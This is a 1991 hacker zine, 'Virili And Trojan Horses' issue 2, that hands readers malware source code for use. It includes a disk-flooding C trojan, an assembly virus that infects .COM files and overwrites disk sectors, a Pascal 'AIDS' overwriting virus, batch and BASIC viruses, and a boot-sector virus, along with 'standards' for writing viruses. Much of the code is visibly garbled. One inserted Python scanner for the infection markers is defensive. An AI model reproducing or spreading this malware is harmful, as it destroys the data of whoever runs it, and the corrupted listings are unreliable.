                    @@@@@@@@@@@               @@@@@@@@@@@@@
                    @                                     @
                    @       Virili And Trojan Horses      @
                    @                                     @
                    @    A Protagonist's Point Of View    @
                    @                                     @
                    @              Issue #2               @
                    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@


 -----------------------------------------------------------------------------
 2.1  Title Page, Introduction, & TOC....................... Doctor Dissector
 2.2  Another Explanation Of Virili And Trojans............. Acid Phreak
 2.3  V-IDEA-1.............................................. Ashton Darkside
 2.4  V-IDEA-2.............................................. Ashton Darkside
 2.5  The Generic Virus..................................... Doctor Dissector
 2.6  Aids.................................................. Doctor Dissector
 2.7  Batch File Virus...................................... PHUN 3.2
 2.8  Basic Virus........................................... PHUN 3.2
 2.9  The Alemeda Virus..................................... PHUN 4.3


=========================================================================
Subject:  INTVT Issue 2 1/1
To:       tk0jut2
                    The International Network of Thieves    2/16/91
                         Virus and Trojan Oriented
                               Volume No. 2
Welcome back!  Hey guys, (and gals I hope!) error in last issue, the date
was incorrect.  The actual date of INT/VT1.TXT should have been 1/29/91.  
Sorry dudez, had some people think it was a year old...  Ok, geez, 
already issue two? You people have been waiting for it haven't you?  GOOD!

SOME INFORMATION ABOUT DEBUG
----------------------------
     Since not everyone has Turbo Debugger, sNOOp, or some of the nicer
debuggers, we're going to stick with using the DOS debug.  Those of you who
already write virii and/or are familiar with debug may want to skip this
section and pick up later down in the article.  This is for the beginners to
debug.  Here is a basic listing of commands for debug:

  COMMAND / USAGE          / COMMENTS
    A       A[address]       A0100:0100  Start assembling at address 0100:0100
    C       C[range address] CC100,1FF 300 Compare portion of memory
    D       D[range]         D0100  Displays the contents of memory at 0100
    F       F[range list]    F0100 L 100 fill 100 bytes
    G       G[address]       G runs the current program
    H       H[values]        H 100 108  adds and subtracts hex numbers
    I       I[value]         I2F8 input one byte from port specified
    M       M[range address] move blocks of memory
    N       N[name]          Names file (i.e. N Joe.exe)
    Q       Q                Terminates Debug
    R       R[register]      Shows the register and edit it
    S       S[range list]    Search the specified range for bytes
    T       T                Trace through program
    W       W[amt. of bytes] Save to disk
     While these are not explained in great detail, it is not necessary to
do so at this time, but as we use them it will be.  I recommend you go to the
bookstore and purchase Peter Norton's Guide to Assembly Language.  It will run
you about $25.00, and then download MASM5.0 from The EoD.  MASM stands for
Microsoft Assembler, for those of you who are new to this.  Also available are
Turbo C and Turbo C++ v2.00 and Turbo Pascal v6.00.  Feel free to call and D/L
these files.  Reading Peter Norton's book will make what you find here much
easier.  Also, it will teach you how to program in assembler, something we DO
NOT plan to do here; our aim is to sharpen your knowledge or HELP you learn it.
Something else you need is the BOOK of INT's.  Soon to be available on The EoD.

LESSON 2, ANOTHER SIMPLE TROJAN IN C
Our last trojan was in ASM; this one is in C, and is known as Crazy.  What it
does is make tons of directories on someone's HD.  You say, "ooo, big deal."
Exactly, it's a VERY BIG deal.  In DOS, you can not remove more than one DIR at
a time.  Can you imagine removing all of those DIR's by hand?  It could take
weeks, months, or years.


#include        <stdio.h>
#include        <stdlib.h>  /* Include Files */
#include        <dir.h>    /* Used by C to make life easier */

main()
{
        char tmp[20];
        char far *ptr;

        for (i=0;i<=50;i++){   /* random loop to make dirs */
                srand(rand());
                ptr = itoa(rand(),tmp,10);
                mkdir ( ptr ); /* makes the DIR */
                chdir ( ptr );
                for (j=0;j<=50;j++){
                        ptr = itoa(rand(),tmp,10);
                        mkdir( ptr );
                chdir ("\\");
        }
}
     While we are not going deep into how this works, we give you the source
so you can compile it and have some real nice fun killing an HD.  If you would
like the compiled version (EXE version) you can get it off of many BBS's
including The EoD.



*******************************************************************************
DISCLAIMER: This text file is provided to the masses for INFORMATIONAL PURPOSES
   ONLY! The author does NOT condone  the use of this information in any manner
   that would be illegal or harmful. The fact that the author knows and spreads
   this information in no way suggests that he uses it. The author also accepts
   no responsibility  for the  malicious use of this  information by anyone who
   reads it! Remember, we may talk a lot, but we "just say no" to doing it.
*******************************************************************************





     C O R R U P T E D   P R* * *   present   * * *

            CPI Virus Standards - Protect yourself and your friends
                    By Ashton Darkside (DUNE / SATAN / CPI)


*******************************************************************************
DISCLAIMER: This text file is provided to the masses for INFORMATIONAL PURPOSES
   ONLY! The author does NOT condone  the use of this information in any manner
   that would be illegal or harmful. The fact that the author knows and spreads
   this information in no way suggests that he uses it. The author also accepts
   no responsibility  for the  malicious use of this  information by anyone who
   reads it! Remember, we may talk a lot, but we "just say no" to doing it.
*******************************************************************************







        One of the  main problems with viruses is that  once you set one loose,
it is no longer under your control.  I propose to stop this by introducing some
standards of  virus writing that will  enable them to  be deactivated  whenever
they enter a "friendly" (CPI) system.  In the long run,  even the author of the
virus is not immune to being attacked. The following are what I have termed the
CPI standards for writing viruses.  They will allow a virus to easily check any
system they are  being run on  for a type of "identity badge".  If it is found,
the virus will  not infect the  system it is being run on.  The other standards
are mostly written around this.

CPI Standards for writing viruses -

        1 - Required  that  activation  periods  begin on January 1  and end on
            December 31. This will coincide  with the changing  identity codes.

        2 - The virus will check for an  identity code by  executing Interrupt
            12h  with the  following register  settings:  AX - 4350, BX - 4920,
            CX - AB46, DX - 554E.  If the system  is  friendly, then a  pointer
            will be returned in CX:DX to an ASCIIZ (0-terminated) string  which
            will have different contents in different years.  The codes are not
            to be included in any text file,  and should only  be given through
            E-mail at  The Andromeda Strain BBS.  If a system  is detected as
            friendly, it is ok  to display a  little  greeting message  about
            how lucky the user was.

==============================================================================
                                   Generic Virus

==============================================================================

;=============================================================================

MAIN:
      NOP                       ;| Marker bytes that identify this program
      NOP                       ;| as infected/a virus
      NOP                       ;|

      MOV AX,00                 ;| Initialize the pointers
      MOV ES:[POINTER],AX       ;|
      MOV ES:[COUNTER],AX       ;|
      MOV ES:[DISKS B],AL       ;|

      MOV AH,19                 ;| Get the selected drive (dir?)
      INT 21                    ;|

      MOV CS:DRIVE,AL           ;| Get current path (save drive)
      MOV AH,47                 ;| (dir?)
      MOV DH,0                  ;|
      ADD AL,1                  ;|
      MOV DL,AL                 ;| (in actual drive)
      LEA SI,CS:OLD_PATH        ;|
      INT 21                    ;|
      MOV AH,0E                    Find # of drives
      MOV DL,0                    
      INT 21
      CMP AL,01                 ;| (Check if only one drive)
      JNZ HUPS3                    (If not one drive, go the HUPS3)
        V AL,06                 ;| Set pointer to SEARCH_ORDER +6 (one drive)
      HUPS3: MOV AH,0           ;| Execute this if there is more than 1 drive
      LEA BX,SEARCH_ORDER       ;|
      ADD BX,AX                   
      ADD BX,0001
      MOV CS:POINTER,BX         ;|
      CLC                       ;|

CHANGE_DISK:                       Carry is set if no more .COM files are
      JNC NO_NAME_CHANGE        ;| found. From here, .EXE files will be
        V AH,17                    renamed to .COM (change .EXE to .COM)
        A DX    MASKE_EXE       ;| to large to fit in memory@ when starting
      CMP AL,0FF                ;| larger infected programs
      JNZ NO_NAME_CHANGE        ;| (Check if an .EXE is found)

      MOV AH,2CH                   If neither .COM or .EXE files can be found,
      INT 21                       then random sectors on the disk will be
      MOV BX,CS:[BX]               in milliseconds. This is the time of the
      MOV BX,DX                 ;| complete oinfection@ of a storage medium.
      MOV CX,2                     The virus can find nothing more to infect
      MOV DH,0                  ;| starts its destruction.
      INT 26                       (write crap on disk)

NO_NAME_CHANGE:                    Check if the end of the search order table
      MOV BX,CS:POINTER            has been reached. If so, end.
      DEC BX                    ;|
      MOV CS:POINTER,BX         ;|
      MOV DL,CS:[BX]            ;|
      CMP DL,0FF                ;|
      JNZ HUPS2                 ;|
      JMP HOPS                    

HUPS2:                          ;| Get a new drive from the search order table
      MOV AH,0E                 ;| and select it, beginning with the ROOT dir.
      INT 21                       (change drive)
      MOV AH,3B                    (change path)
      LEA DX,PATH               ;|
      INT 21                    ;|
      JMP FIND_FIRST_FILE       ;|

FIND_FIRST_SUBDIR:                 S ing from the root, search for the
      MOV AH,17                    first subdir. First, (change .exe to .com)
      LEA DX,CS:MASKE_EXE       ;| convert all .EXE files to .COM in the
      INT 21                       old directory.
        V AH,3B                    (use root directory)
      LEA DX,PATH
      INT 21           
        V AH,04E                   (search for first subdirectory)
      MOV CX,00010001B             (dir mask)
      LEA DX,MASKE_DIR
      INT 21  
      JC CHANGE_DISK            ;|
      MOV BX,CS:COUNTER         ;|
      INC BX                      
      DEC BX                      
      JZ  USE_NEXT_SUBDIR       ;|

FIND_NEXT_SUBDIR:                  Search for the next sub-dir, if no more
      MOV AH,4FH                ;| are found, the (search for next subdir)
      INT 21                    ;| drive will be changed.
      JC CHANGE_DISK            ;|
      DEC BX                      
      JNZ FIND_NEXT_SUBDIR      ;|

USE_NEXT_SUBDIR:
      MOV AH,2FH                   Select found directory. (get dta address)

      ADD BX,1CH                ;|
        V ES:[BX],W@\@              address of name in dta)
      INC BX          
      PUSH DS
      MOV AX,ES     
        V DS,AX        
      MOV DX,BX
      MOV AH,3B                    (change path)
      INT 21             
      POP DS                    ;|
      MOV BX,CS:COUNTER         ;|
      INC BX                    ;|
      MOV CS:COUNTER,BX         ;|

FIND_FIRST_FILE:                   Find first .COM file in the current dir.
      MOV AH,04E                ;| If there are none, (Search for first)
      MOV CX,00000001B          ;| search the next directory. (mask)
      LEA DX,MASKE_COM          ;|
      INT 21                    ;|
      JC FIND_FIRST_SUBDIR
      JMP CHECK_IF_ILL

FIND_NEXT_FILE:                    If program is ill (infected) then search
      MOV AH,4FH                   for another. (search for next)
      INT 21   
      JC FIND_FIRST_SUBDIR

CHECK_IF_ILL:                      Check if already infected by virus.
      MOV AH,3D                    (open channel)
      MOV AL,02                    (read/write)
        V DX,9EH                   (address of name in dta)
        T BX,AX                    (save channel)
      MOV AH,3FH                ;| (read file)
      MOV CH,BUFLEN             ;|
        V DX,BUFFER                (write in buffer)
      INT 21                    ;|
      MOV AH,3EH                   (close file)

      MOV BX,CS:[BUFFER]        ;| (look for three NOPYs)
      CMP BX,9090     
      JZ FIND_NEXT_FILE         ;|
              3                    This section by-passes (write enable)
      MOV AL,0                     the MS/PC DOS Write Protection.
      MOV DX,9EH                ;| (address of name in dta)
      INT 21                    ;|
      MOV AL,01                   
      AND CX,11111110B          ;|
      INT 21                    ;|
        V AL,02                    access (read/write)
        V DX,9EH                   (address of name in dta)
      INT 21                    ;|
        V BX,AX                    Read date entry of program and (channel)
      MOV AH,57                    save for future use. (get date)
        V AL,0                  ;|
      INT 21     
      PUSH CX                      (save date)
      PUSH DX                   ;|
        V DX,CS:[CONTA W]       ;| T   jump located at 0100h (save old jmp)
        V CS:[JMPBUF],DX        ;| the program will be saved for future use.
      MOV DX,CS:[BUFFER+1]      ;| (save new jump)
      LEA CX,CONT-100
      SUB DX,CX
      MOV CS:[CONTA],DX
      MOV AL,1                     to the start of the file.
      POP DX                      
      POP CX                        restore date)

      MOV AH,3EH                ;| (close file)
      INT 21                      
        V DX,CS:[JMPBUF]        ;| Restore the old jump address. The virus
      MOV CS:[CONTA],DX            at address oCONTA@ the jump which was at the
                                   start of the program. This is done to
HOPS:                              preserve the executability of the host
      NOP                       ;| program as much as possible. After saving,
      CALL USE_OLD              ;| it still works with the jump address in the
                                ;| virus. The jump address in the virus differs
                                ;| from the jump address in memory

CONT  DB  0E9                      Continue with the host program (make jump)
CONTA DW  0            
      MOV AH,00                 ;|
      INT 21                      

USE_OLMOV AH,0E                    Reactivate the selected (use old drive)
      MOV DL,CS:DRIVE              drive at the start of the program, and
      INT 21                       reactivate the selected path at the start
      MOV AH,3B                    of the program.(use old drive)
      LEA DX,OLD_PATH-1         ;| (get old path and backslash)
      INT 21                    ;|
      RET                       ;|

SEARCH_ORDER DB 0FF,1,0,2,3,0FF,00,0FF

POINTER      DW   0000             (pointer f. search order)
COUNTER      DW   0000             (counter f. nth. search)
DISKS        DB   0                (number of disks)
MASKE_COM    DB o*.COM@,00      ;| (search for com files)
MASKE_DIR    DB o*@,00             (search for dirYs)
MASKE_EXE    DB 0FF,0,0,0,0,0,00111111XB
             DB 0,@????????EXE@,0,0,0,0
             DB 0,@????????COM@,0
MASKE_ALL    DB 0FF,0,0,0,0,0,00111111XB
             DB 0,@???????????@,0,0,0,0
             DB 0,@????????COM@,0

BUFFER EQU 0E00                    (a safe place)

BUFLEN EQU 208H                 ;| Length of virus. Modify this accordingly
                                   if you modify this source. Be careful
                                   for this may change!

JMPBUF EQU BUFFER+BUFLEN        ;| (a safe place for jmp)

PATH  DB o\@,0                      first place)
DRIVE DB 0                          actual drive)
BACK_SLASH DB o\@
OLD_PATH DB 32 DUP (?)              old path)
============================================================================
                                  AIDS Virus
============================================================================
{ Beginning of source code, Turbo Pascal 3.01a }
{C-}
{U-}
{I-}       { Wont allow a user break, enable IO check }

{ -- Constants --------------------------------------- }

Const
     VirusSize = 13847;    { AIDSYs code size }
     Warning   :String[42]     { Warning message }
     = ZThis File Has Been Infected By AIDS! HaHa!Y;

{ -- Type declarations------------------------------------- }

Type
     DTARec    =Record      { Data area for file search }
     DOSnext  :Array[1..21] of Byte;
                   Attr    : Byte;Ftime,
                   FDate,
                   FLsize,
                   FHsize  : Integer;
                   FullName: Array[1..13] of Char;
                 End;

Registers    = Record    {Register set used for file search }
   Case Byte of
   1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer);
   2 : (AL,AH,BL,BH,CL,CH,DL,DH          : Byte);
   End;

{ -- Variables--------------------------------------------- }

Var
                               { Memory offset program code }
   Pr                                     { Infected marker }
   MarkInfected : String[42] absolute Cseg:$180;
   Reg          : Registers;                 { Register set }
   DTA          : DTARec;                       { Data area }
   Buffer       : Array[Byte] of Byte;        { Data buffer }
   TestID       : String[42]; { To recognize infected files }
   UsePath      : String[66];        { Path to search files }
                                    { Lenght of search path }
   UsePathLenght: Byte absolute UsePath;
   Go           : File;                    { File to infect }
   B            : Byte;                              { Used }
   LoopVar      : Integer;  {Will loop forever}

{ -- Program code------------------------------------------ }

BeGetDir(0, UsePath);               { get current directory }
  ifUsePath := UsePath + Z\Y;
  UsePath := UsePath + Z*.COMY;        { Define search mask }
  Reg.AH := $1A;                            { Set data area
  Reg.DS := Seg(DTA);
  Reg.DX := Ofs(DTA);
  MsDos(Reg);
  UsePath[Succ(UsePathLenght)]:=#0; { Path must end with #0
  Reg.AH := $4E;
  Reg.DS := Seg(UsePath);
  Reg.DX := Ofs(UsePath[1]);
  Reg.CX := $ff;          { Set attribute to find ALL files }
  MsDos(Reg);                   { Find first matching entry
  IF not Odd(Reg.Flags) Then         { If a file found then
    Repeat
      UsePath := DTA.FullName;
      B := Pos(#0, UsePath);
      If B > 0 then
      Delete(UsePath, B, 255);             { Remove garbage }
      Assign(Go, UsePath);
      If IOresult = 0 Then          { If not IO error then }
      Begin
        BlockRead(Go, Buffer, 2);
        Move(Buffer[$80], TestID, 43);
                      { Test if file already ill(Infected) }
        If TestID <> Warning Then        { If not then ... }
        Begin
          Seek (Go, 0);
                            { Mark file as infected and .. }
          MarkInfected := Warning;
                                               { Infect it }
          BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7));
          Halt;                   {.. and halt the program }
        End;
        Close(Go);
        { The file has already been infected, search next. }
      Reg.AH := $4F;
      Reg.DS := Seg(DTA);
      Reg.DX := Ofs(DTA);
    Until Odd(Reg.Flags);
Loopvar:=Random(10);
If Loopvar=7 then
beWriteln(Z








Y);                          {Give a lot of smiles}
Writeln(ZY);
Writeln(Z     Y);
Writeln(Z                                 ATTENTION:
 Y);
Writeln(Z      I have been elected to inform you that throughout your process o
fY);
Writeln(Z     collecting and executing files, you have accidentally H^Z^ZK?

Y
);
Writeln(Z      yourself over; again, thatYZs PHUCKED yourself over. No, it cann
o
t Y);
Writeln(Z      be; YES, it CAN be, a w^ZD^Zs has infected your system. Now what
d
o
 Y);
Writeln(Z      you have to say about that? HAHAHAHA. Have H^Z__ with this one an

Y);
Writeln(Z                       remember, there is NO cure for
 Y);
W       Z
 Y);
W                 7777777777     777777777777    77777777777      7777777777

W                777^~^~^~^~^~^~777     ^~^~^~^~77^~^~^~^~^~^~   77^~^~^~^~^~^~^

~777    777^~^~^~^~^~^~^~77

Writ^~^~
 Y);
Writeln(Z        77^~       77^~        77^~        77^~       77^~   77^~
 Y);
Writeln(Z        777777777777^~        77^~        77^~       77^~   77777777777

7
 Y);
Writeln(Z        77^~^~^~^~^~^~^~^~77^~        77^~        77^~       77^~    ^~

^~^~^~^~^~^~^~^~77^~
 Y);
Writeln(Z        77^~       77^~        77^~        77^~       77^~77^~ Y);
Writeln(Z        77^~       77^~        77^~        77^~      777^~   7Y);
Writlln(         77^~       77^~   777777777777    77777777777^~^~    7777777777^~^~Y);
Writeln(Z         ^~^~        ^~^~    ^~^~^~^~^~^~^~^~^~^~^~^~    ^~^~^~^~^~^~^~
Writeln(Z^~^~^~^~      ^~^~^~^~^~^~^~^~^~^~W       ZY);
Writeln(Z     Y);
REPEAT
LOOPVAR:=0;
UNTIL LOOPVAR=1;
end;
End.

{ Although this is a primitive virus, it's effective. }
{ In this virus only the .COM                         }
{ files are infected. It's about 13K and it will      }
{ change the date entry.                              }
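Both infection checks described above (the Generic Virus's CHECK_IF_ILL, which reads the start of a .COM file into BUFFER and compares the first word against 9090h, and the AIDS virus's comparison of TestID against its Warning string stored at CS:$180) are signatures a scanner can look for from the defender's side. The following Python script is an added example, not code from this zine or its authors: it checks raw .COM images for those two markers. The sample images are constructed inside the script, and the function and constant names are my own.

```python
from pathlib import Path

# Generic Virus marker: the code begins with three NOPs; CHECK_IF_ILL reads the
# file into BUFFER and compares the first word against 9090h.
NOP_MARKER = b"\x90\x90\x90"

# AIDS marker: a Turbo Pascal String[42] placed at CS:$180. A .COM file loads
# at offset 100h, so in the file the marker sits at offset 80h as a length
# byte (42) followed by the 42-character warning text.
AIDS_TEXT = b"This File Has Been Infected By AIDS! HaHa!"
AIDS_OFFSET = 0x180 - 0x100
AIDS_MARKER = bytes([len(AIDS_TEXT)]) + AIDS_TEXT


def scan_image(image: bytes) -> list:
    """Return the names of the infection markers found in a raw .COM image."""
    hits = []
    if image.startswith(NOP_MARKER):
        hits.append("generic-virus-nop-marker")
    if image[AIDS_OFFSET:AIDS_OFFSET + len(AIDS_MARKER)] == AIDS_MARKER:
        hits.append("aids-pascal-marker")
    return hits


def scan_directory(root: str) -> dict:
    """Scan every .COM file under root; map each path to the markers found."""
    results = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() == ".com":
            results[str(path)] = scan_image(path.read_bytes())
    return results


# Constructed sample images (hypothetical, not real infected binaries):
# a tiny "clean" program padded to 256 bytes, then the two marked variants.
CLEAN_COM = b"\xb4\x4c\xcd\x21" + b"\x00" * 252          # mov ah,4Ch / int 21h
NOP_COM = NOP_MARKER + CLEAN_COM
AIDS_COM = (CLEAN_COM[:AIDS_OFFSET] + AIDS_MARKER
            + CLEAN_COM[AIDS_OFFSET + len(AIDS_MARKER):])

if __name__ == "__main__":
    for name, image in (("clean", CLEAN_COM), ("nop", NOP_COM), ("aids", AIDS_COM)):
        print(f"{name}: {scan_image(image) or 'no markers'}")
```

The NOP prefix is a weak signature: any legitimate program that happens to begin with three NOPs will match, so treat that hit as a prompt for closer inspection rather than proof. The AIDS marker is specific: a length byte of 42 followed by the exact text at file offset 80h, which is where the Pascal program's `absolute Cseg:$180` variable lands once the .COM is loaded at 100h.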


[2.7]

                            Batch Viruses
                            -------------


Who would have thought that viruses could be in a BATCH file?  This virus, which
we are about to see, makes use of the MS-DOS operating system.  This BATCH virus
uses the DEBUG & EDLIN programs.

Name: VR.BAT

echo = off         ( Self explanatory)
ctty nul           ( This is important. Console output is turned off)
path c:\msdos      ( May differ on other systems )
dir *.com/w>ind    ( The directory is written on "ind", ONLY name entries)

edlin ind<1        ( "ind" is processed with EDLIN so only file names appear)
debug ind<2        ( New batch program is created with debug)
edlin name.bat<3   ( This batch goes to an executable form because of EDLIN)
ctty con           ( Console interface is again assigned)
name               ( Newly created NAME.BAT is called.)


In addition to this batch file, there are three command files, here named 1, 2, 3.

Here is the first command file:
-------------------------------
Name: 1

1,4d               ( Here line 1-4 of the oIND@ file are deleted )
e                  ( Save file )

Here is the second command file:
--------------------------------
Name: 2

m100,10b,f000       First program name is moved to the F000H address to save

e108 o.BAT@        (Extention of file name is changed to .BAT)
m100,10b,f010       File is saved again)
e100@DEL o          DEL command is written to address 100H)
mf000,f00b,104     (Original file is written after this command)
e10c 2e            (Period is placed in from of extension)
e110 0d,0a         (Carrige return+ line feed)
mf010,f020,11f     ( Modified file is moved to 11FH address from buffer area)
e112 oCOPY \VR.BAT@ ( COPY command is now placed in front of file)
e12b od,0a         (COPY command terminated with carriage return + lf)
rxc                ( The CX register is ... )
2c                 ( set to 2CH)
nname.bat            Name it NAME.BAT)
w                    Write )
q                  ( quit )


The third command file must be printed as a hex dump because it contains
2 control characters (1Ah=Control Z) and this is not entirely printable.

Hex dump of the third command file:
-----------------------------------
Name: 3

0100   31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79
       1  ,  1  ?        .  .  n  y  y  y  y  y  y  y
0110   79 29 0D 32 2C 32 3F 52-20 1A OD 6E 6E 79 79 79
       y     .  2  ,  ?  ?  r     .  .  n  n  y  y  y
0120   79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00
       y  y  y  y     .  E  .  .  .  .  .  .  .  .  .


In order for this virus to work VR.BAT should be in the root. This program
only affects .COM files.


[2.8]
                           Viruses in Basic
                           ----------------


Basic is a great language, and often people think of it as a limited language
that will not be of any use in creating something like a virus.  Well, you are
really wrong.  Let's take a look at a Basic virus created by R. Burger in 1987.
This program is an overwriting virus and uses SHELL (MS-DOS) to infect .EXE
files.  To do this you must compile the source code using Microsoft
QuickBASIC.  Note the length of the compiled and linked .EXE file and edit
the source code to place the length of the object program in the LENGHTVIR
variable.  BV3.EXE should be in the current directory, COMMAND.COM must be
available, the LENGHTVIR variable must be set to the length of the linked
program, and remember to use the /e parameter when compiling.



10 REM ** DEMO
20 REM ** MODIFY IT YOUR OWN WAY IF DESIRED **
30 REM ** BASIC DOESNT SUCK
40 REM ** NO KIDDING
50 ON ERROR GOTO 670
60 REM *** LENGHTVIR MUST BE SET **
70 REM *** TO THE LENGHT TO THE **
80 REM *** LINKED PROGRAM ***
90 LENGHTVIR=2641
100 VIRROOT$=@BV3.EXE@
110 REM *** WRITE THE DIRECTORY IN THE FILE oINH@
130 SHELL oDIR *.EXE>INH@
140 REM ** OPEN oINH@ FILE AND READ NAMES **
150 OPEN oR@,1,@INH@,32000
160 GET #1,1
170 LINE INPUT#1,ORIGINAL$
180 LINE INPUT#1,ORIGINAL$
190 LINE INPUT#1,ORIGINAL$
200 LINE INPUT#1,ORIGINAL$
210 ON ERROR GOT 670
220 CLOSE#2
230 F=1:LINE INPUT#1,ORIGINAL$
240 REM ** o%@ IS THE MARKER OF THE BV3
250 REM ** o%@ IN THE NAME MEANS
260 REM  ** INFECTED COPY PRESENT
270 IF MID$(ORIGINAL$,1,1)=@%@ THEN GOTO 210
280 ORIGINAL$=MID$(ORIGINAL$,1,13)
290 EXTENSIONS$=MID$(ORIGINAL,9,13)
300 MID$(EXTENSIONS$,1,1)=@.@
310 REM *** CONCATENATE NAMES INTO FILENAMES **
320 F=F+1
330 IF MID$(ORIGINAL$,F,1)=@ o OR MID$ (ORIGINAL$,F,1)=@.@ OR F=13 THEN
GOTO 350
340 GOTO 320
350 ORIGINAL$=MID$(ORIGINAL$,1,F-1)+EXTENSION$
360 ON ERROR GOTO 210
365 TEST$=@o
370 REM ++ OPEN FILE FOUND +++
380 OPEN oR@,2,OROGINAL$,LENGHTVIR
390 IF LOF(2) < LENGHTVIR THEN GOTO 420
400 GET #2,2
410 LINE INPUT#1,TEST$
420 CLOSE#2
431     ++ CHECK IF PROGRAM IS ILL ++
44      ++ o%@ AT THE END OF THE FILE MEANS..
450 REM ++ FILE IS ALREADY SICK ++
460 REM IF MID$(TEST,2,1)=@%@ THEN GOTO 210
470 CLOSE#1
480 ORIGINALS$=ORIGINAL$
490 MID$(ORIGINALS$,1,1)=@%@
499 REM ++++ SANE oHEALTHY@ PROGRAM ++++
510 C$=@COPY o+ORIGINAL$+@ o+ORIGINALS$
520 SHELL C$
530 REM *** COPY VIRUS TO HEALTHY PROGRAM ****
540 C$=@COPY o+VIRROOT$+ORIGINAL$
550 SHELL C$
560 REM *** APPEND VIRUS MARKER ***
570 OPEN ORIGINAL$ FOR APPEND AS #1 LEN=13
580 WRITE#1,ORIGINALS$
590 CLOSE#1
630 REM ++ OUYPUT MESSAGE ++
640 PRINT oINFECTION IN o ;ORIGIANAL$; o  !! BE WARE !!@
650 SYSTEM
660     ** VIRUS ERROR MESSAGE
670 PRINT oVIRUS INTERNAL ERROR GOTTCHA !!!!@:SYSTEM
680 END


This basic virus will only attack .EXE files.  After the execution you will
see an "INH" file which contains the directory, and the file %SORT.EXE.
Programs which start with "%" are NOT infected; they pose as backup copies.


Subject:  CPI Issue 2 9/11
To:       tk0jut2
Original_To:  BITNET%"tk0jut2@niu"


;[2.9]
;-----------------------------------------------------------------------;
; This virus is of the "FLOPPY ONLY" variety.                           ;
; It replicates to the boot sector of a floppy disk and when it gains   ;
; control it will move itself to upper memory.  It redirects the        ;
; keyboard interrupt (INT 09H) to look for ALT-CTRL-DEL sequences, at   ;
; which time it will attempt to infect any floppy it finds in drive A:. ;
; It keeps the real boot sector at track 39, sector 8, head 0.          ;
; It does not map this sector bad in the FAT (unlike the Pakistani      ;
; Brain), and should that area be used by a file, the virus will die.   ;
; It also contains no anti-detection mechanisms as does the BRAIN       ;
; virus.  It apparently uses head 0, sector 8 and not head 1, sector 9  ;
; because this is common to all floppy formats, both single sided and   ;
; double sided.  It does not contain any malevolent TROJAN HORSE code.  ;
; It does appear to contain a count of how many times it has infected   ;
; other diskettes, although this is harmless and the count is never     ;
; accessed.                                                             ;
;                                                                       ;
; Things to note about this virus:                                      ;
; It can not only live through an ALT-CTRL-DEL reboot command, but this ;
; is its primary (only, for that matter) means of reproduction to other ;
; floppy diskettes.  The only way to remove it from an infected system  ;
; is to turn the machine off and reboot an uninfected copy of DOS.      ;
; It is even resident when no floppy is booted but BASIC is loaded      ;
; instead.  Then when ALT-CTRL-DEL is pressed from inside of BASIC,     ;
; it activates and infects the floppy from which the user is            ;
; attempting to boot.                                                   ;
;                                                                       ;
; Also note that because of the POP CS command used to pass control to  ;
; itself in upper memory, this virus does not work on 80286 machines    ;
; (because this is not a valid 80286 instruction).                      ;
;                                                                       ;
; If your assembler will not allow the POP CS command to execute,       ;
; replace the POP CS command with a NOP and then assemble it, then      ;
; debug that part of the code and place POP CS in place of the NOP at   ;
; that section.                                                         ;
;                                                                       ;
; The Norton Utilities can be used to identify infected diskettes by    ;
; looking at the boot sector, and the DOS SYS utility can be used to    ;
; remove it (unlike the Pakistani Brain).                               ;
;-----------------------------------------------------------------------;
                        ;
    ORG  7C00H               ;
                        ;
TOS LABEL     WORD           ;TOP OF STACK
;-----------------------------------------------------------------------
; 1. Find top of memory and copy ourself up there. (keeping same offset)
; 2. Save a copy of the first 32 interrupt vectors to top of memory too
; 3. Redirect int 9 (keyboard) to ourself in top of memory
; 4. Jump to ourself at top of memory                            
; 5. Load and execute REAL boot sector from track 40, head 0, sector 8
;-----------------------------------------------------------------------
BEGIN:   CLI                 ;INITIALIZE STACK
    XOR  AX,AX               ;
    MOV  SS,AX               ;
    MOV  SP,offset TOS       ;
    STI                 ;
                        ;
    MOV  BX,0040H       ;ES = TOP OF MEMORY - (7C00H+512)
    MOV  DS,BX               ;
    MOV  ES,AX               ;
                        ;
    PUSH CS             ;DS = CS
    POP  DS             ;
    CMP  DI,3456H       ;IF THE VIRUS IS REBOOTING...
    JNE  B_10           ;
    DEC  Word Ptr [COUNTER_1]     ;...LOW&HI:COUNTER_1--
                        ;
B_10MOV  DI,SI
    REP  MOVSB               ;

         SI,CX     ;CX=0          ;SAVE FIRST 32 INT VETOR ADDRESSES TO
         DI,offset BEGIN - 128    ;   128 BYTES BELOW OUR HI CODE
                        ;CALL PUT_NEW_09       SAVE/REDIRECT INT 9 (KEYBOARD)

         E    ;ES=HI    ;   JUMP TO OUR HI CODE WITH
    MOV  BX,SP              SP=7C00  ;LOAD REAL BOOT SECTOR TO 0000:7C00
    MOV  DX,CX          ;CX=0        ;DRIVE A: HEAD 0
         CX,2708H       ;   TRACK 40, SECTOR 8
    JB   $              ;   HANG IF ERROR

                                                       ;
;-----------------------------------------------------------------------;
; SAVE THEN REDIRECT INT 9 VECTOR                                       ;
;                                                                       ;
; ON ENTRY:   DS = 0                                                    ;
;        ES = WHERE TO SAVE OLD_09 & (HI)                               ;
;             WHERE NEW_09 IS         (HI)                              ;
;-----------------------------------------------------------------------;
PUT_MOV  SI,9*4              ;COPY INT 9 VECTOR TO
         DI,offset OLD_09    ;   OLD_09 (IN OUR HI CODE!)
    MOV  [(9*4)+2],ES        ;
                                   STI                 ;

    RET                 ;
                        ;
;-----------------------------------------------------------------------
; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR
;-----------------------------------------------------------------------
ACK_KEYBD:                   ;
    IN   AL,61H              ;RESET KEYBOARD THEN CONTINUE
    JMP  RBOOT  

;-----------------------------------------------------------------------;
; DATA AREA WHICH IS NOT USED IN THIS VERSION                           ;
; REASON UNKNOWN                                                        ;
;-----------------------------------------------------------------------;
TABLE    DB   27H,0,1,2      ;FORMAT INFORMATION FOR TRACK 39DB  DB   27H,0,4,2
    DB   27H,0,5,2      ;
    DB   27H,0,6,2      ;
    DB   27H,0,7,2      ;
                        ;
;A7CDW   00026H

;L7CA1:                      ;
    POP  CX             ;NOT USED
    POP  DI             ;
    POP  SI             ;
                        ;
;-----------------------------------------------------------------------;
; IF ALT & CTRL & DEL THEN ...                                          ;
